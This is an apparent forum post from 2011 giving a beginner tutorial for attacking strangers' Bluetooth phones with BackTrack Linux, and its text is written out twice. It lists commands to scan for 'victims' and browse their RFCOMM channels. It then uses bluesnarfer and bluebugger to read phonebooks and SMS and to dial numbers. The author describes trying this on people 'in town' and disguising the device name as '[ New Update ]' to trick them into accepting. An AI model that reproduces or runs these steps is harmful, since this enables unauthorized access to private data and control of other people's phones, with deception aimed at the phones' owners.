Bluetooth Hack and configure [Linux] /Backtrack. 04-14-2011, 11:24 PM
#1
DIdnt find any tutorial for Backtrack Bluetooth "hacking" so i thought i could share this . .
i tried this in town and it works sometime as long as the victim actually ac cept it, i cant call it a hack but there arent that much bluetooth guides out there so . .
For Backtrack :
Configure rfcomm first, if you havent already done that,
(Scan for victims)
(ping the vitcim to see if he is awake)
(browse the victim for rfcomm channels to connect to)
(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)
(to see available opions to do )
(Dial number )
.......................
Maby not the greatest tutorial but if you arent experienced with bluetooth in backtrack you can always try this,
it works 4 / 10 times in town so maby not the greatest way to hack bluetooth phones but its fun when you suc ceed.
I usually change my Device name to [ New Update ] or [ you entered a new time zone ] so it doesn't sound so suspicious and its more likely that the victim ac cepts, unless he has a Pin passwd then you are pretty much screwed.
Its my first tutorial so dont judge me to hard ^^, but its always good to share the things you know right? =)
i tried this in town and it works sometime as long as the victim actually ac cept it, i cant call it a hack but there arent that much bluetooth guides out there so . .
For Backtrack :
Configure rfcomm first, if you havent already done that,
Code:
mkdir -p /dev/bluetooth/rfcomm
Code:
mknod -m 666 /dev/bluetooth/rfcomm/ 0 c 216 0
Code:
mknod --mode=666 /dev/rfcomm0 c 216 0
Code:
hciconfig hci0 up
Code:
hciconfig hci0
(Scan for victims)
Code:
hcitool scan hci0
(ping the vitcim to see if he is awake)
Code:
l2ping < victim mac addr>
(browse the victim for rfcomm channels to connect to)
Code:
sdptool browse --tree --l2cap < mac addr >
(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)
Code:
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
(to see available opions to do )
Code:
bluebugger -h
(Dial number )
Code:
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >
.......................
Maby not the greatest tutorial but if you arent experienced with bluetooth in backtrack you can always try this,
it works 4 / 10 times in town so maby not the greatest way to hack bluetooth phones but its fun when you suc ceed.
I usually change my Device name to [ New Update ] or [ you entered a new time zone ] so it doesn't sound so suspicious and its more likely that the victim ac cepts, unless he has a Pin passwd then you are pretty much screwed.
Its my first tutorial so dont judge me to hard ^^, but its always good to share the things you know right? =)